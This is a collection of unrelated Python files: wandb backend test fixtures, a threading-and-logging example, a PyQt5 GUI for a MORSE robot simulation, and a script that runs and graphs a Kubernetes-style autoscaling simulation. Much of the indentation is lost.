self.interface = fake_interface
yield FakeBackend()
@pytest.fixture
def fake_run(fake_backend):
def run_fn():
s = wandb.Settings()
run = wandb_sdk.wandb_run.Run(settings=s)
run._set_backend(fake_backend)
return run
yield run_fn
@pytest.fixture
def records_util():
def records_fn(q):
ru = utils.RecordsUtil(q)
return ru
yield records_fn
@pytest.fixture
def user_test(fake_run, record_q, records_util):
class UserTest:
pass
ut = UserTest()
ut.get_run = fake_run
ut.get_records = lambda: records_util(record_q)
yield ut
# @pytest.hookimpl(tryfirst=True, hookwrapper=True)
# def pytest_runtest_makereport(item, call):
# outcome = yield
# rep = outcome.get_result()
# if rep.when == "call" and rep.failed:
# print("DEBUG PYTEST", rep, item, call, outcome)
@pytest.fixture
def log_debug(caplog):
caplog.set_level(logging.DEBUG)
yield
# for rec in caplog.records:
# print("LOGGER", rec.message, file=sys.stderr)
# ----------------------
# internal test fixtures
# ----------------------
@pytest.fixture()
def internal_result_q():
return queue.Queue()
@pytest.fixture()
def internal_sender_q():
return queue.Queue()
@pytest.fixture()
def internal_writer_q():
return queue.Queue()
@pytest.fixture()
def internal_process():
# FIXME: return mocked process (needs is_alive())
return MockProcess()
class MockProcess:
def __init__(self):
self._alive = True
def is_alive(self):
return self._alive
@pytest.fixture()
def _internal_sender(record_q, internal_result_q, internal_process):
return BackendSender(
record_q=record_q, result_q=internal_result_q, process=internal_process,
)
@pytest.fixture()
def internal_sm(
runner,
internal_sender_q,
internal_result_q,
test_settings,
mock_server,
_internal_sender,
):
with runner.isolated_filesystem():
test_settings.root_dir = os.getcwd()
sm = SendManager(
settings=test_settings,
record_q=internal_sender_q,
result_q=internal_result_q,
interface=_internal_sender,
)
yield sm
@pytest.fixture()
def stopped_event():
stopped = threading.Event()
yield stopped
@pytest.fixture()
def internal_hm(
runner,
record_q,
internal_result_q,
test_settings,
mock_server,
internal_sender_q,
internal_writer_q,
_internal_sender,
stopped_event,
):
with runner.isolated_filesystem():
test_settings.root_dir = os.getcwd()
hm = HandleManager(
settings=test_settings,
record_q=record_q,
result_q=internal_result_q,
stopped=stopped_event,
sender_q=internal_sender_q,
writer_q=internal_writer_q,
interface=_internal_sender,
)
yield hm
@pytest.fixture()
def internal_get_record():
def _get_record(input_q, timeout=None):
try:
i = input_q.get(timeout=timeout)
except queue.Empty:
return None
return i
return _get_record
@pytest.fixture()
def start_send_thread(
internal_sender_q, internal_get_record, stopped_event, internal_process
):
def start_send(send_manager):
def target():
try:
while True:
payload = internal_get_record(
input_q=internal_sender_q, timeout=0.1
)
if payload:
send_manager.send(payload)
elif stopped_event.is_set():
break
except Exception as e:
stopped_event.set()
internal_process._alive = False
t = threading.Thread(target=target)
t.name = "testing-sender"
t.daemon = True
t.start()
return t
yield start_send
stopped_event.set()
@pytest.fixture()
def start_handle_thread(record_q, internal_get_record, stopped_event):
def start_handle(handle_manager):
def target():
while True:
payload = internal_get_record(input_q=record_q, timeout=0.1)
if payload:
handle_manager.handle(payload)
elif stopped_event.is_set():
break
t = threading.Thread(target=target)
t.name = "testing-handler"
t.daemon = True
t.start()
return t
yield start_handle
stopped_event.set()
@pytest.fixture()
def _start_backend(
mocked_run,
internal_hm,
internal_sm,
_internal_sender,
start_handle_thread,
start_send_thread,
log_debug,
):
def start_backend_func(initial_run=True, initial_start=False):
ht = start_handle_thread(internal_hm)
st = start_send_thread(internal_sm)
if initial_run:
run = _internal_sender.communicate_run(mocked_run)
if initial_start:
_internal_sender.communicate_run_start(run.run)
return (ht, st)
yield start_backend_func
@pytest.fixture()
def _stop_backend(
mocked_run,
internal_hm,
internal_sm,
_internal_sender,
start_handle_thread,
start_send_thread,
):
def stop_backend_func(threads=None):
threads = threads or ()
done = False
_internal_sender.publish_exit(0)
for _ in range(30):
poll_exit_resp = _internal_sender.communicate_poll_exit()
if poll_exit_resp:
done = poll_exit_resp.done
if done:
break
time.sleep(1)
_internal_sender.join()
for t in threads:
t.join()
        assert done, "backend didn't shut down"
yield stop_backend_func
@pytest.fixture()
def backend_interface(_start_backend, _stop_backend, _internal_sender):
@contextmanager
def backend_context(initial_run=True, initial_start=False):
threads = _start_backend(initial_run=initial_run, initial_start=initial_start)
try:
yield _internal_sender
finally:
_stop_backend(threads=threads)
return backend_context
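# Hypothetical usage sketch (keyword names are assumed, not defined here):
#
#     def test_history(backend_interface):
#         with backend_interface() as interface:
#             interface.publish_history(data={"loss": 0.5}, step=0)
#
# Entering the context starts the handler/sender threads; leaving it publishes
# exit, polls until done, and joins the threads via _stop_backend.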
@pytest.fixture
def publish_util(
mocked_run, mock_server, backend_interface, parse_ctx,
):
def fn(
metrics=None,
history=None,
artifacts=None,
files=None,
begin_cb=None,
end_cb=None,
initial_start=False,
):
metrics = metrics or []
history = history or []
artifacts = artifacts or []
files = files or []
with backend_interface(initial_start=initial_start) as interface:
if begin_cb:
begin_cb(interface)
for m in metrics:
interface._publish_metric(m)
for h in history:
interface.publish_history(**h)
for a in artifacts:
interface.publish_artifact(**a)
for f in files:
interface.publish_files(**f)
if end_cb:
end_cb(interface)
ctx_util = parse_ctx(mock_server.ctx, run_id=mocked_run.id)
return ctx_util
yield fn
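# Hypothetical usage sketch for publish_util (history dict keys are assumed):
#
#     def test_publish(publish_util):
#         ctx_util = publish_util(history=[dict(data={"acc": 1.0}, step=0)])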
@pytest.fixture
def tbwatcher_util(mocked_run, mock_server, internal_hm, backend_interface, parse_ctx):
def fn(write_function, logdir="./", save=True, root_dir="./"):
with backend_interface() as interface:
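            # hand-build a run_start request so the HandleManager sets up its tb_watcher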
proto_run = pb.RunRecord()
mocked_run._make_proto_run(proto_run)
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(proto_run)
request = pb.Request()
request.run_start.CopyFrom(run_start)
record = pb.Record()
record.request.CopyFrom(request)
internal_hm.handle_request_run_start(record)
internal_hm._tb_watcher.add(logdir, save, root_dir)
# need to sleep to give time for the tb_watcher delay
time.sleep(15)
write_function()
ctx_util = parse_ctx(mock_server.ctx)
return ctx_util
yield fn
@pytest.fixture
def inject_requests(mock_server):
"""Fixture for injecting responses and errors to mock_server."""
# TODO(jhr): make this compatible with live_mock_server
return utils.InjectRequests(ctx=mock_server.ctx)
|
threading_names_log.py
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""Using thread names in logs
"""
#end_pymotw_header
import logging
import threading
import time
logging.basicConfig(
level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-10s) %(message)s',
)
def worker():
logging.debug('Starting')
time.sleep(2)
logging.debug('Exiting')
def my_service():
logging.debug('Starting')
time.sleep(3)
logging.debug('Exiting')
t = threading.Thread(name='my_service', target=my_service)
w = threading.Thread(name='worker', target=worker)
w2 = threading.Thread(target=worker) # use default name
w.start()
w2.start()
t.start()
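# Sample output (interleaving and the default thread name may vary):
#
# [DEBUG] (worker    ) Starting
# [DEBUG] (Thread-1  ) Starting
# [DEBUG] (my_service) Starting
# [DEBUG] (worker    ) Exiting
# [DEBUG] (Thread-1  ) Exiting
# [DEBUG] (my_service) Exiting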
|
GUI_.py
|
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import threading
import subprocess
import psutil
from mega_main import *
import sys
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
plt.style.use('dark_background')
class MorseGUI(QMainWindow):
def __init__(self):
super().__init__()
self.mainWidget = QStackedWidget()
self.setCentralWidget(self.mainWidget)
self.setWindowOpacity(0.8)
        with open("Style.qss", "r") as style_file:
            self.setStyleSheet(style_file.read())
logoWidget = LogoWidget()
self.mainWidget.addWidget(logoWidget)
QTimer.singleShot(1, lambda: self.switch())
self.show()
def switch(self):
mainGUI = MainGUI()
self.mainWidget.addWidget(mainGUI)
self.mainWidget.setCurrentWidget(mainGUI)
class LogoWidget(QWidget):
def __init__(self):
super().__init__()
imageLabel = QLabel(self)
imageLabel.setPixmap(QPixmap('./logo.png'))
imageLabel.setGeometry(0, 0, 1000, 860)
layout = QHBoxLayout()
layout.addWidget(imageLabel)
self.setLayout(layout)
class MainGUI(QWidget):
def __init__(self):
super().__init__()
self.map3D = plt.figure(linewidth=1, edgecolor='g')
self.canvas3D = FigureCanvas(self.map3D)
        # create the 3D axes once via add_subplot (avoids adding a duplicate Axes3D)
        self.ax3D = self.map3D.add_subplot(111, projection="3d")
self.map3D.suptitle("Map 3D - estimation")
self.map2D = plt.figure(linewidth=1, edgecolor='g')
self.canvas = FigureCanvas(self.map2D)
self.ax2D = self.map2D.add_subplot(1, 1, 1)
self.map2D.suptitle("Map 2D - estimation")
self.map3Dpose = plt.figure(linewidth=1, edgecolor='g')
self.canvas3Dpose = FigureCanvas(self.map3Dpose)
        self.ax3Dpose = self.map3Dpose.add_subplot(111, projection="3d")
self.map3Dpose.suptitle("Map 3D - Pose")
self.map2Dpose = plt.figure(linewidth=1, edgecolor='g')
self.canvasPose = FigureCanvas(self.map2Dpose)
self.ax2Dpose = self.map2Dpose.add_subplot(1, 1, 1)
self.map2Dpose.suptitle("Map 2D - Pose")
plt.ion()
self.simTimeInput = QTextEdit(self)
self.simTimeInput.setPlaceholderText("Enter simulation time here ")
self.simTimeInput.setFixedHeight(32)
self.stop_sim = False
self.initUI()
def initUI(self):
self.setGeometry(300, 300, 1000, 860)
start_button = QPushButton('Prepare Environment')
start_button.clicked.connect(self.blender_callback)
run_button = QPushButton('Run Simulation')
run_button.clicked.connect(self.start_callback)
stop_button = QPushButton('Stop Simulation')
stop_button.clicked.connect(self.stop_callback)
layout = QVBoxLayout()
top_box = QHBoxLayout()
mid_box = QHBoxLayout()
bottom_box = QHBoxLayout()
# top part of the GUI
top_box.addWidget(start_button)
top_box.addWidget(self.simTimeInput)
top_box.addWidget(run_button)
top_box.addWidget(stop_button)
# mid part of the GUI
mid_box.addWidget(self.canvas)
mid_box.addWidget(self.canvasPose)
# bottom part of the GUI
bottom_box.addWidget(self.canvas3D)
bottom_box.addWidget(self.canvas3Dpose)
layout.addLayout(top_box, 5)
layout.addLayout(mid_box, 5)
layout.addLayout(bottom_box, 5)
self.setLayout(layout)
self.show()
def blender_callback(self):
subprocess.call("gnome-terminal --tab -- morse run env.py", shell=True)
def start_callback(self):
self.simtime = int(self.simTimeInput.toPlainText())
print("pressed")
self.sim_thread = threading.Thread(target=self.background_tasks)
self.sim_thread.start()
def background_tasks(self):
self.megamain = MegaMain(self.ax2D, self.ax3D, self.ax2Dpose, self.ax3Dpose, self.simtime)
self.megamain.run_simulation()
def stop_callback(self):
self.stop_sim = True
PROCNAME = "blender"
for proc in psutil.process_iter():
if proc.name() == PROCNAME:
proc.kill()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = MorseGUI()
sys.exit(app.exec_())
|
runSimulation.py
|
import threading
from src.request import Request
from src.dep_controller import DepController
from src.api_server import APIServer
from src.req_handler import ReqHandler
from src.node_controller import NodeController
from src.scheduler import Scheduler
import matplotlib.pyplot as plt
import pandas as pd
from src.hpa import HPA
from src.load_balancer import LoadBalancer
from src.supervisor import Supervisor
import time
#This is the simulation frontend that will interact with your APIServer to change cluster configurations and handle requests
#All building files are guidelines, and you are welcome to change them as much as desired so long as the required functionality is still implemented.
_nodeCtlLoop = 1
_depCtlLoop = 1
_scheduleCtlLoop = 1
_hpaCtlLoop = 2
kind = 'UA'
apiServer = APIServer()
depController = DepController(apiServer, _depCtlLoop)
nodeController = NodeController(apiServer, _nodeCtlLoop)
reqHandler = ReqHandler(apiServer)
scheduler = Scheduler(apiServer, _scheduleCtlLoop)
depControllerThread = threading.Thread(target=depController)
nodeControllerThread = threading.Thread(target=nodeController)
reqHandlerThread = threading.Thread(target=reqHandler)
schedulerThread = threading.Thread(target = scheduler)
print("Threads Starting")
reqHandlerThread.start()
nodeControllerThread.start()
depControllerThread.start()
schedulerThread.start()
print("ReadingFile")
#Graphing information
depPods1 = []
depPods2 = []
depPods3 = []
depPendPods1 = []
depPendPods2 = []
depPendPods3 = []
dep1PendReqs = []
dep2PendReqs = []
dep3PendReqs = []
stepList = []
#Simulation information
loadBalancers = []
hpas = []
supervisors = []
hpaThreads = []
loadBalancerThreads = []
supervisorThreads = []
count = 0
SEED = "ml_3"
instructions = open(f"tracefiles/{SEED}.txt", "r")
commands = instructions.readlines()
for command in commands:
cmdAttributes = command.split()
print(str(command))
with apiServer.etcdLock:
if cmdAttributes[0] == 'Deploy':
apiServer.CreateDeployment(cmdAttributes[1:])
deployment = apiServer.GetDepByLabel(cmdAttributes[1])
loadbalancer = LoadBalancer(kind, apiServer, deployment)
lbThread = threading.Thread(target=loadbalancer)
lbThread.start()
loadBalancers.append(loadbalancer)
loadBalancerThreads.append(lbThread)
elif cmdAttributes[0] == 'AddNode':
apiServer.CreateWorker(cmdAttributes[1:])
elif cmdAttributes[0] == 'DeleteDeployment':
            # We have to make sure that our load balancer will end gracefully here
for loadBalancer in loadBalancers:
if loadBalancer.deployment.deploymentLabel == cmdAttributes[1]:
loadBalancer.running=False
apiServer.RemoveDeployment(cmdAttributes[1:])
elif cmdAttributes[0] == 'ReqIn':
apiServer.PushReq(cmdAttributes[1:])
elif cmdAttributes[0] == 'CreateHPA':
hpa = HPA(apiServer, _hpaCtlLoop, cmdAttributes[1:])
hpaThread = threading.Thread(target=hpa)
hpaThread.start()
hpas.append(hpa)
hpaThreads.append(hpaThread)
supervisor = Supervisor(apiServer, hpa)
supervisorThread = threading.Thread(target=supervisor)
supervisorThread.start()
supervisors.append(supervisor)
supervisorThreads.append(supervisorThread)
elif cmdAttributes[0] == 'CrashPod':
apiServer.CrashPod(cmdAttributes[1:])
#The instructions will sleep after each round of requests. The following code stores values for graphing
if cmdAttributes[0] == 'Sleep':
count+=1
time.sleep(int(cmdAttributes[1]))
if len(apiServer.etcd.deploymentList) == 1:
depPods1.append(apiServer.etcd.deploymentList[0].expectedReplicas)
depPods2.append(0)
depPods3.append(0)
count1 = 0
for pod in apiServer.etcd.pendingPodList:
if pod.deploymentLabel ==apiServer.etcd.deploymentList[0].deploymentLabel:
count1+=1
depPendPods1.append(count1)
depPendPods2.append(0)
depPendPods3.append(0)
dep1PendReqs.append(len(apiServer.etcd.deploymentList[0].pendingReqs))
dep2PendReqs.append(0)
dep3PendReqs.append(0)
elif len(apiServer.etcd.deploymentList) == 2:
depPods1.append(apiServer.etcd.deploymentList[0].expectedReplicas)
depPods2.append(apiServer.etcd.deploymentList[1].expectedReplicas)
depPods3.append(0)
count1 = 0
count2 = 0
for pod in apiServer.etcd.pendingPodList:
if pod.deploymentLabel ==apiServer.etcd.deploymentList[0].deploymentLabel:
count1+=1
if pod.deploymentLabel ==apiServer.etcd.deploymentList[1].deploymentLabel:
count2+=1
depPendPods1.append(count1)
depPendPods2.append(count2)
depPendPods3.append(0)
dep1PendReqs.append(len(apiServer.etcd.deploymentList[0].pendingReqs))
dep2PendReqs.append(len(apiServer.etcd.deploymentList[1].pendingReqs))
dep3PendReqs.append(0)
elif len(apiServer.etcd.deploymentList) == 3:
depPods1.append(apiServer.etcd.deploymentList[0].expectedReplicas)
depPods2.append(apiServer.etcd.deploymentList[1].expectedReplicas)
depPods3.append(apiServer.etcd.deploymentList[2].expectedReplicas)
count1 = 0
count2 = 0
count3 = 0
for pod in apiServer.etcd.pendingPodList:
if pod.deploymentLabel ==apiServer.etcd.deploymentList[0].deploymentLabel:
count1+=1
if pod.deploymentLabel ==apiServer.etcd.deploymentList[1].deploymentLabel:
count2+=1
                    if pod.deploymentLabel == apiServer.etcd.deploymentList[2].deploymentLabel:
                        count3+=1
depPendPods1.append(count1)
depPendPods2.append(count2)
depPendPods3.append(count3)
dep1PendReqs.append(len(apiServer.etcd.deploymentList[0].pendingReqs))
dep2PendReqs.append(len(apiServer.etcd.deploymentList[1].pendingReqs))
dep3PendReqs.append(len(apiServer.etcd.deploymentList[2].pendingReqs))
else:
depPods1.append(0)
depPods2.append(0)
depPods3.append(0)
depPendPods1.append(0)
depPendPods2.append(0)
depPendPods3.append(0)
dep1PendReqs.append(0)
dep2PendReqs.append(0)
dep3PendReqs.append(0)
#pendReqsList.append(len(apiServer.etcd.pendingReqs))
stepList.append(count)
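        # A sketch (equivalent in spirit, names taken from above) of a more compact
        # way to record the same per-deployment stats without one branch per count:
        #
        #     deployments = apiServer.etcd.deploymentList
        #     series = ((depPods1, depPendPods1, dep1PendReqs),
        #               (depPods2, depPendPods2, dep2PendReqs),
        #               (depPods3, depPendPods3, dep3PendReqs))
        #     for slot, (pods, pend, reqs) in enumerate(series):
        #         if slot < len(deployments):
        #             dep = deployments[slot]
        #             pods.append(dep.expectedReplicas)
        #             pend.append(sum(1 for p in apiServer.etcd.pendingPodList
        #                             if p.deploymentLabel == dep.deploymentLabel))
        #             reqs.append(len(dep.pendingReqs))
        #         else:
        #             pods.append(0)
        #             pend.append(0)
        #             reqs.append(0)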
time.sleep(5)
print("Shutting down threads")
for hpa in hpas:
hpa.running = False
hpa.calibrate.set()
reqHandler.running = False
depController.running = False
scheduler.running = False
nodeController.running = False
apiServer.requestWaiting.set()
for lbthread in loadBalancerThreads:
lbthread.join()
for hpathread in hpaThreads:
    hpathread.join()
for supervisorThread in supervisorThreads:
supervisorThread.join()
depControllerThread.join()
schedulerThread.join()
nodeControllerThread.join()
reqHandlerThread.join()
fig, ((hpa1, hpa2, hpa3), (pp, ap, pr)) = plt.subplots(2,3)
hpa1.plot(hpas[0].xValues, hpas[0].setPoints, color='black', label = 'Setpoint Dep1')
hpa1.plot(hpas[0].xValues, hpas[0].utilValues, color='blue', label = 'CPU util Dep1')
hpa1.set_title('HPA for Deployment 1')
hpa2.plot(hpas[1].xValues, hpas[1].setPoints, color='black', label = 'Setpoint Dep2')
hpa2.plot(hpas[1].xValues, hpas[1].utilValues, color='green', label = 'CPU util Dep2')
hpa2.set_title('HPA for Deployment 2')
hpa3.plot(hpas[2].xValues, hpas[2].setPoints, color='black', label = 'Setpoint Dep3')
hpa3.plot(hpas[2].xValues, hpas[2].utilValues, color='red', label = 'CPU util Dep3')
hpa3.set_title('HPA for Deployment 3')
pp.plot(stepList, depPendPods1, color = 'blue', label = 'Pending Pods Dep1')
pp.plot(stepList, depPendPods2, color = 'green', label = 'Pending Pod Dep2')
pp.plot(stepList, depPendPods3, color = 'red', label = 'Pending Pod Dep3')
ap.plot(stepList, depPods1, color = 'blue', label = 'Active Pods Dep1')
ap.plot(stepList, depPods2, color = 'green', label = 'Active Pods Dep2')
ap.plot(stepList, depPods3, color = 'red', label = 'Active Pods Dep3')
pr.plot(stepList, dep1PendReqs, color='blue', label = 'Pending Requests Dep1')
pr.plot(stepList, dep2PendReqs, color='green', label = 'Pending Requests Dep2')
pr.plot(stepList, dep3PendReqs, color='red', label = 'Pending Requests Dep3')
for ax in fig.get_axes():
ax.legend()
plt.savefig(f'graph/{SEED}_main.png')
H1_Data = {
'time': supervisors[0].timestampAudit,
'Kp': supervisors[0].pValues,
'Ki': supervisors[0].iValues,
'avg_error': supervisors[0].avgErrors,
}
h1_df = pd.DataFrame(H1_Data,columns=['time', 'Kp', 'Ki', 'avg_error'])
print(f"List of samples for {supervisors[0].hpa.deploymentLabel}")
print(h1_df)
H2_Data = {
'time': supervisors[1].timestampAudit,
'Kp': supervisors[1].pValues,
'Ki': supervisors[1].iValues,
'avg_error': supervisors[1].avgErrors
}
h2_df = pd.DataFrame(H2_Data,columns=['time', 'Kp', 'Ki', 'avg_error'])
print(f"List of samples for {supervisors[1].hpa.deploymentLabel}")
print(h2_df)
H3_Data = {
'time': supervisors[2].timestampAudit,
'Kp': supervisors[2].pValues,
'Ki': supervisors[2].iValues,
'avg_error': supervisors[2].avgErrors
}
h3_df = pd.DataFrame(H3_Data,columns=['time', 'Kp', 'Ki', 'avg_error'])
print(f"List of samples for {supervisors[2].hpa.deploymentLabel}")
print(h3_df)
fig, ((h1, h2, h3)) = plt.subplots(1,3, subplot_kw={"projection": "3d"}, figsize=(16, 8))
h1.scatter(h1_df['Kp'], h1_df['Ki'], h1_df['avg_error'], color='blue')
h1.set_xlabel('Kp')
h1.set_ylabel('Ki')
h1.set_zlabel('avg_error')
h2.scatter(h2_df['Kp'], h2_df['Ki'], h2_df['avg_error'], color='blue')
h2.set_xlabel('Kp')
h2.set_ylabel('Ki')
h2.set_zlabel('avg_error')
h3.scatter(h3_df['Kp'], h3_df['Ki'], h3_df['avg_error'], color='blue')
h3.set_xlabel('Kp')
h3.set_ylabel('Ki')
h3.set_zlabel('avg_error')
plt.savefig(f'graph/{SEED}_errors.png')
|